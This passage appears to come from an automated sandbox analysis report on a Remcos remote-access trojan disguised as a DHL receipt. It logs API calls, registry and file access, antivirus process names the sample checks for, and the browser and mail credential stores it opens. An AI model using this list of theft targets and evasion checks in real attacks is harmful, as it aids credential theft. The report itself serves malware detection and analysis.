Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoA, 5_2_2D5AF8D1
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5F2543
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5E8404
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_2D5F243C
Source: C:\ProgramData\Remcos\remcos.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 5_2_2D5F1CD8
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F1F50
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F1F9B
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_2D5F2610
Source: C:\ProgramData\Remcos\remcos.exe Code function: EnumSystemLocalesW, 5_2_2D5F2036
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5E88ED
Source: C:\ProgramData\Remcos\remcos.exe Code function: GetLocaleInfoW, 5_2_2D5F2313
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 7_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 8_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 8_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 8_2_00007FF7689B6EE4
Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 11_2_00007FF7689C51EC
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 11_2_00007FF7689C3140
Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc, 11_2_00007FF7689B6EE4
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\Public\xkn.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Remcos\remcos.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A91A4 GetLocalTime, 0_2_028A91A4
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5B60D GetComputerNameExW,GetUserNameW, 0_2_2DA5B60D
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_2DA893AD
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AB724 GetVersionExA, 0_2_028AB724
Source: C:\Users\Public\xkn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0_2_2DA4BA12
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 0_2_2DA4BB30
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: \key3.db 0_2_2DA4BB30
Source: C:\Users\Public\alpha.exe File opened: \\Windows \
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\Remcos\remcos.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8144, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: C:\ProgramData\Remcos\remcos.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: cmd.exe 0_2_2DA4569A